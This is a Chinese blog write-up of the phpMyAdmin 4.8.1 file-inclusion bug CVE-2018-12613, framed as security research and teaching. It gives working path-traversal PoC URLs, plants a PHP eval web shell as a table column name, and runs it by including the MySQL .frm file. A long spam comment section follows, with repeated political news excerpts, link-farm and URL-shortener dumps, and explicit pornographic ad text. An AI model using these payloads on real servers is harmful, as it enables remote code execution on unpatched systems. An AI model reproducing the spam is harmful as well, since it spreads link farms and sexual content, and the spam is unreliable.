title

CVE-2018-12613 phpMyAdmin 4.8.1 LFI to RCE

文章开头首先感谢vulnspy,大佬带小菜鸡飞!

waring

本文提供思路和方法可能带有攻击性,仅供安全研究与教学之用,风险自负!

vulnerable version

phpMyAdmin <= 4.8.1

vulnerable code

phpMyAdmin-4.8.1-all-languages

environment

macOS

vulnerable code

phpMyAdmin-4.8.1-all-languages/index.php

imgs

看见include第一反应是不是应该想到LFI(文件包含),需满足一下条件

 1.不在$target_blacklist中.(import.php、export.php)

 2.满足Core::checkPageValidity

跟进checkPageValidity

imgs

看逻辑实际只需要拼接target = 白名单中的文件?../../即可满足白名单的判断
所以poc构造(这里随便使用一个名单中的文件, db_datadict.php)

index.php?target=db_datadict.php%3f/../../../../../

tips
  在php中,超全局变量 $_GET,$_POST,$_REQUEST
会自动调用urldecode

在windows中,db_datadict.php?/../../会被视为非法路径

所以可以对?进行两次url编码%253f 

而db_datadict.php%3f/../../在windows中是合法的

所以windows总的poc
index.php?target=db_datadict.php%253f/../../../../

详见手册中对urldecode的描述
文件包含的分析到此结束

LFI TO RCE

在数据库中创建表,写入一句话或其他代码为字段名

CREATE TABLE `test`.`test1` 
( `<? php @eval($_GET['testforfun']); ?>` INT NOT NULL )
ENGINE = InnoDB

查到数据库绝对路径,文件包含(这里我发现我的mysql路径不可读,为了复现 强行777)

show global variables like "%datadir%";

例如我的路径/usr/local/mysql/data/

之后拼接数据名+表名.frm

例如我创建的数据名为test,表名为test2.frm

所以绝对路径/usr/local/mysql/data/test/test2.frm
imgs

cat /usr/local/mysql/data/test/test2.frm 如下图所示

所以构造我的poc如下:

http://localhost/phpMyAdmin-4.8.1-all-languages/index.php?testforfun=phpinfo();&target=db_datadict.php%3f/../../../../../../usr/local/mysql/data/test/test2.frm
imgs

think

学无止境

reference

vulnspy-phpMyAdmin 4.8.x 本地文件包含漏洞利用

735 对 “CVE-2018-12613 phpMyAdmin 4.8.1 LFI to RCE”的想法;

  66. Trump’s pressure on investigators prompted Rep.
    http://www.babelcube.com/user/ashley-adams-1 https://permacultureglobal.org/users/42779-wisdom-crowfeather https://www.obesityhelp.com/members/outriggr1964/about_me/ https://www.shutterstock.com/g/paganka1991/about https://forums.giantitp.com/member.php?288383-protesian1977&tab=aboutme#aboutme

    Zoe Lofgren, who sits on the House committee probing the insurrection, to warn that the ex-President had issued a “call to arms.”
    “Calling out for demonstrations if, you know, anything adverse, legally, happens to him, is pretty extraordinary. And I think it’s important to think through what message is being sent,” the California Democrat told CNN’s Pamela Brown on Sunday.
    In yet another sign of Trump’s incessantly consuming inability to accept his election loss, he issued a statement that same evening slamming former Vice President Mike Pence for refusing his demands to overturn the result of the democratic election in 2020, and falsely claimed that the then-vice president had the power to do so.

    回复

  78. Trump’s pressure on investigators prompted Rep.
    https://www.obesityhelp.com/members/kakashka91994/about_me/ https://learn.acloud.guru/profile/doroteya1993 http://cyclograph1977.idea.informer.com/ http://www.babelcube.com/user/felicia-chapman-71 https://www.obesityhelp.com/members/redemptor1984/about_me/

    Zoe Lofgren, who sits on the House committee probing the insurrection, to warn that the ex-President had issued a “call to arms.”
    “Calling out for demonstrations if, you know, anything adverse, legally, happens to him, is pretty extraordinary. And I think it’s important to think through what message is being sent,” the California Democrat told CNN’s Pamela Brown on Sunday.
    In yet another sign of Trump’s incessantly consuming inability to accept his election loss, he issued a statement that same evening slamming former Vice President Mike Pence for refusing his demands to overturn the result of the democratic election in 2020, and falsely claimed that the then-vice president had the power to do so.

    回复

  82. https://rebrand.ly/72e1dd https://cutt.ly/THvcltN https://cutt.ly/gHvbWnk https://rebrand.ly/1de799 http://ubezpieczeniablonie.pl/ https://is.gd/uQ4HSV https://Cutt.ly/fHvcKI1 http://Ubezpieczeniagdansk.Com.pl/ https://Tinyurl.com/rk4w3hzh https://tinyurl.com/3bemdmd4
    https://tinyurl.com/2p9djedy https://rebrand.ly/4ae84c https://rebrand.ly/668ac1 https://is.gd/PoAbzY https://cutt.ly/3HvvJeP https://is.gd/1dP0So https://tinyurl.com/5bwmm2cf https://is.gd/T3VgAb https://bit.ly/3yETO8t https://bit.ly/3LgekPx
    rebrand.ly cutt.ly cutt.ly bit.ly https://bit.ly/ https://is.gd/n85rHK ubezpieczenieauta.com.pl https://is.gd
    https://cutt.ly/KHvcbmW https://cutt.ly Tinyurl.com rebrand.ly
    cutt.ly https://tinyurl.com/
    is.gd http://ubezpieczenia-czorny.pl/

    回复
  83. Pingback: seo backlink building services
  87. Pingback: รับทำบัญชี

  122. Trump’s pressure on investigators prompted Rep.
    https://forums.giantitp.com/member.php?285884-treexa1999&tab=aboutme#aboutme https://www.metal-archives.com/users/gdgddgdg1985 https://www.quia.com/profiles/markperry https://rabbitroom.com/members/whistlestop1974/profile/ https://www.shutterstock.com/g/pr1n1972/about

    Zoe Lofgren, who sits on the House committee probing the insurrection, to warn that the ex-President had issued a “call to arms.”
    “Calling out for demonstrations if, you know, anything adverse, legally, happens to him, is pretty extraordinary. And I think it’s important to think through what message is being sent,” the California Democrat told CNN’s Pamela Brown on Sunday.
    In yet another sign of Trump’s incessantly consuming inability to accept his election loss, he issued a statement that same evening slamming former Vice President Mike Pence for refusing his demands to overturn the result of the democratic election in 2020, and falsely claimed that the then-vice president had the power to do so.

    回复

  162. Trump’s pressure on investigators prompted Rep.
    http://salamandrine1953.idea.informer.com/ https://forums.giantitp.com/member.php?286459-xl2x1962&tab=aboutme#aboutme https://porncoven.com/members/53832-otekdumose1977?tab=aboutme#aboutme https://www.myvidster.com/profile/opulence1967 https://anotepad.com/notes/hjxxemjn

    Zoe Lofgren, who sits on the House committee probing the insurrection, to warn that the ex-President had issued a “call to arms.”
    “Calling out for demonstrations if, you know, anything adverse, legally, happens to him, is pretty extraordinary. And I think it’s important to think through what message is being sent,” the California Democrat told CNN’s Pamela Brown on Sunday.
    In yet another sign of Trump’s incessantly consuming inability to accept his election loss, he issued a statement that same evening slamming former Vice President Mike Pence for refusing his demands to overturn the result of the democratic election in 2020, and falsely claimed that the then-vice president had the power to do so.

    回复

  195. Trump’s pressure on investigators prompted Rep.
    https://holeymole1980.diary.ru/ https://www.rezeptwelt.de/profile/umbilical1965/1067270 https://www.obesityhelp.com/members/montesuma1955/about_me/ https://tubeteencam.com/user/burgrave1965/profile https://www.dnnsoftware.com/activity-feed/my-profile/userid/3161116

    Zoe Lofgren, who sits on the House committee probing the insurrection, to warn that the ex-President had issued a “call to arms.”
    “Calling out for demonstrations if, you know, anything adverse, legally, happens to him, is pretty extraordinary. And I think it’s important to think through what message is being sent,” the California Democrat told CNN’s Pamela Brown on Sunday.
    In yet another sign of Trump’s incessantly consuming inability to accept his election loss, he issued a statement that same evening slamming former Vice President Mike Pence for refusing his demands to overturn the result of the democratic election in 2020, and falsely claimed that the then-vice president had the power to do so.

    回复

  216. Trump’s pressure on investigators prompted Rep.
    https://christy-miller.ck.page/9ad8e744e0 https://esydiable1953.diary.ru/ https://michelle-mayweather.ck.page/cf264bbc7f http://photozou.jp/user/top/3333156 https://rentry.org/9wy5q

    Zoe Lofgren, who sits on the House committee probing the insurrection, to warn that the ex-President had issued a “call to arms.”
    “Calling out for demonstrations if, you know, anything adverse, legally, happens to him, is pretty extraordinary. And I think it’s important to think through what message is being sent,” the California Democrat told CNN’s Pamela Brown on Sunday.
    In yet another sign of Trump’s incessantly consuming inability to accept his election loss, he issued a statement that same evening slamming former Vice President Mike Pence for refusing his demands to overturn the result of the democratic election in 2020, and falsely claimed that the then-vice president had the power to do so.

    回复

  431. Sexy drunk girl eagerly sucks beer from a martini glass in a real porn video.
    Pussies get pounded extra hard when these hot girls are drunk in a porn flick.
    A X-rated drunken fuck session with vodka spilled all over the sheets.
    Watch as she gets fully nude and begs for anal in a crazy drunken porn video.
    These horny girls get down and dirty when the martinis flow in a naughty porn vid.
    Get ready to cum as these real hot girls get fucked after a few beers.
    Anal sex gets extra kinky when they are too drunk in an R-rated porn video.
    Sloshed girls get banged while the vodka is still on their lips in another XXX clip.
    Naughty drunken porn with beer flowing everywhere as she screams in pleasure.
    Slippery fun with hot naked drunk girls sprawled out begging for more from her partner.
    A nude sex romp with vodka and cocktails running down her lips in an allowed porn video.
    A wild evening of drunken porn that’s sure to get your adrenaline pumping.
    Wet pussy licking as an intoxicated girl begs for his cum in a real porn flick.
    https://www.obesityhelp.com/members/loculate1995/about_me/ https://www.sandiegoreader.com/users/shamblecorpse1952/ https://www.cossa.ru/profile/?ID=217834 https://www.shutterstock.com/g/pyretic1987/about https://ellak.gr/user/konig1964/

    A XXX drunken orgy that is filled with lots of naughty action and pleasure.

    回复

  483. Sexy drunk girl eagerly sucks beer from a martini glass in a real porn video.
    Pussies get pounded extra hard when these hot girls are drunk in a porn flick.
    A X-rated drunken fuck session with vodka spilled all over the sheets.
    Watch as she gets fully nude and begs for anal in a crazy drunken porn video.
    These horny girls get down and dirty when the martinis flow in a naughty porn vid.
    Get ready to cum as these real hot girls get fucked after a few beers.
    Anal sex gets extra kinky when they are too drunk in an R-rated porn video.
    Sloshed girls get banged while the vodka is still on their lips in another XXX clip.
    Naughty drunken porn with beer flowing everywhere as she screams in pleasure.
    Slippery fun with hot naked drunk girls sprawled out begging for more from her partner.
    A nude sex romp with vodka and cocktails running down her lips in an allowed porn video.
    A wild evening of drunken porn that’s sure to get your adrenaline pumping.
    Wet pussy licking as an intoxicated girl begs for his cum in a real porn flick.
    https://www.haikudeck.com/presentations/0Yy0i7oirR https://anotepad.com/notes/65gn2yac https://rentry.org/wiy66 https://paraeagle1991.diary.ru/ http://seevjaleo1955.idea.informer.com/

    A XXX drunken orgy that is filled with lots of naughty action and pleasure.

    回复

  517. Sexy drunk girl eagerly sucks beer from a martini glass in a real porn video.
    Pussies get pounded extra hard when these hot girls are drunk in a porn flick.
    A X-rated drunken fuck session with vodka spilled all over the sheets.
    Watch as she gets fully nude and begs for anal in a crazy drunken porn video.
    These horny girls get down and dirty when the martinis flow in a naughty porn vid.
    Get ready to cum as these real hot girls get fucked after a few beers.
    Anal sex gets extra kinky when they are too drunk in an R-rated porn video.
    Sloshed girls get banged while the vodka is still on their lips in another XXX clip.
    Naughty drunken porn with beer flowing everywhere as she screams in pleasure.
    Slippery fun with hot naked drunk girls sprawled out begging for more from her partner.
    A nude sex romp with vodka and cocktails running down her lips in an allowed porn video.
    A wild evening of drunken porn that’s sure to get your adrenaline pumping.
    Wet pussy licking as an intoxicated girl begs for his cum in a real porn flick.
    https://everday1966.diary.ru/ https://kaiserin1986.diary.ru/ https://www.shutterstock.com/g/yayafretum1960/about https://tubeteencam.com/user/uryokapi1989/profile https://chyoa.com/user/hyperbole1987

    A XXX drunken orgy that is filled with lots of naughty action and pleasure.

    回复

  581. Sexy drunk girl eagerly sucks beer from a martini glass in a real porn video.
    Pussies get pounded extra hard when these hot girls are drunk in a porn flick.
    A X-rated drunken fuck session with vodka spilled all over the sheets.
    Watch as she gets fully nude and begs for anal in a crazy drunken porn video.
    These horny girls get down and dirty when the martinis flow in a naughty porn vid.
    Get ready to cum as these real hot girls get fucked after a few beers.
    Anal sex gets extra kinky when they are too drunk in an R-rated porn video.
    Sloshed girls get banged while the vodka is still on their lips in another XXX clip.
    Naughty drunken porn with beer flowing everywhere as she screams in pleasure.
    Slippery fun with hot naked drunk girls sprawled out begging for more from her partner.
    A nude sex romp with vodka and cocktails running down her lips in an allowed porn video.
    A wild evening of drunken porn that’s sure to get your adrenaline pumping.
    Wet pussy licking as an intoxicated girl begs for his cum in a real porn flick.
    https://zapytaj.zhp.pl/user/alehandro1961 https://haveagood.holiday/users/315876 https://pastehere.xyz/gofd9boKf/ https://www.zillow.com/profile/riseup1958 https://www.haikudeck.com/presentations/FFguFnFmXI

    A XXX drunken orgy that is filled with lots of naughty action and pleasure.

    回复